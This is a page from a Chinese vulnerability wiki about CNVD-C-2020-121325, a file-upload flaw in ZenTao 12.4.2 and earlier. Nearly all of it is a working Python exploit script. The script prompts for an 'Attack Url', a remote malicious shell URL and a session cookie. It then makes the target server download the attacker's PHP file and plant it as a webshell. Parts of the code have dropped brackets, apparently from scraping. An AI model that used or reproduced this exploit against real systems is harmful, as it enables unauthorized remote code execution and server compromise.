◆◆0

CNVD-C-2020-121325 禅道小于12.4.2 文件上传漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

POC

#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from   : http://wiki.peiqi.tech

import base64
import requests
import random
import re
import json
import sys

def title():
    print('+------------------------------------------')
    print('+  \03334mPOC_Des: http://wiki.peiqi.tech                                   \0330m')
    print('+  \03334mGithub : https://github.com/PeiQi0                                 \0330m')
    print('+  \03334m公众号 : PeiQi文库                                                \0330m')
    print('+  \03334mVersion: zentao version <= 12.4.2                                 \0330m')
    print('+  \03336m使用格式: python3 CNVD-C-2020-121325.py                             \0330m')
    print('+  \03336mUrl         >>> http://xxx.xxx.xxx.xxx                             \0330m')
    print('+  \03336mShell       >>> http://xxx.xxx.xxx.xxx/shell.php(恶意文件地址)       \0330m')
    print('+  \03336mZentaosid   >>> xxxxxxxxxxxxxx(cookie字段)                          \0330m')
    print('+------------------------------------------')

def POC_1(target_url):
    version_url = target_url + "/www/index.php?mode=getconfig"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        response = requests.get(url=version_url, timeout=20, headers=headers)
        version = json.loads(response.text)'version'
        print("\03332mo 禅道版本为:{}\0330m".format(version))

    except Exception as e:
        print("\03331mx 获取版本失败 \0330m", e)


def POC_2(target_url, shell_url, zentaosid):
    options = shell_url.split("://")
    if options0 == "http":
        shell_url = "HTTP://" + options1
    elif options0 == "ftp":
        shell_url = "ftp://" + options1
    else:
        print("\03331mx 请使用正确的请求地址 \0330m")
        sys.exit(0)

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Cookie":"zentaosid={}".format(zentaosid)
    }

    shell_url_base = str((base64.b64encode(shell_url.encode('utf-8'))),'utf-8')
    vuln_url = target_url + "/www/index.php?m=client&f=download&version=test&link={}".format(shell_url_base)
    print("\03332mo 请求漏洞url：{}\0330m".format(vuln_url))

    try:
        response = requests.get(url=vuln_url, timeout=20, headers=headers)
        if "保存成功" in response.text:
            print("\03332mo 成功写入Webshell，URL地址为：{}/www/data/client/test/Webshell_name.php\0330m".format(target_url))
        else:
            print("\03331mx 恶意文件下载失败 \0330m")
    except:
        print("\03331mx 恶意文件下载失败 \0330m")



if __name__ == '__main__':
    title()
    target_url = str(input("\03335mPlease input Attack Url\nUrl   >>> \0330m"))
    shell_url  = str(input("\03335mShell >>> \0330m"))
    zentaosid  = str(input("\03335mZentaosid >>> \0330m"))
    POC_1(target_url)
    POC_2(target_url, shell_url, zentaosid)

参考

http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/%E7%A6%85%E9%81%93CMS/%E7%A6%85%E9%81%93%20%E5%B0%8F%E4%BA%8E12.4.2%20%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%20CNVD-C-2020-121325.html

免费、自由、人人可编辑的漏洞库

返回顶部